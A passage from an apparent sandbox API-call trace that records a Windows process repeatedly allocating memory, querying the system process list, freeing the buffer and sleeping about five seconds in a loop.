Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0204.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0204.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0204.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0204.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0205.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0205.136] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0205.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0205.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0205.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0205.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0205.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0205.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0205.270] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0205.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0205.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0205.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0205.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0205.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0205.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0205.463] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0205.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0205.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0205.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0205.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0205.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0205.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0205.641] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0205.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0205.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0205.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0205.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0205.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0205.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0205.843] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0205.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0205.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0205.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0205.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0205.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0205.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0205.993] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0205.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0205.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0205.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0205.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0205.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0206.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0206.136] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0206.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0206.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0206.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0206.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0206.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0206.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0206.247] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0206.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0206.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0206.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0206.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0206.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0206.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0206.369] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0206.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0206.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0206.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0206.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0206.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0206.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0206.514] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0206.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0206.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0206.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0206.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0206.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0206.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0206.679] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0206.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0206.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0206.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0206.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0206.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0206.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0206.796] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0206.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0206.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0206.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0206.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0206.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0206.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0206.921] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0206.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0206.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0206.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0206.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0206.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0207.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0207.043] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0207.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0207.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0207.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0207.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0207.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0207.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0207.156] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0207.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0207.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0207.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0207.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0207.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0207.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0207.318] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0207.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0207.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0207.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0207.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0207.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0207.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0207.466] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0207.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0207.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0207.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0207.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0207.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0207.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0207.630] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0207.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0207.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0207.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0207.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0207.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0207.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0207.789] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0207.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0207.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0207.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0207.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0207.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0207.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0207.903] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0207.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0207.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0207.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0207.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0207.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: 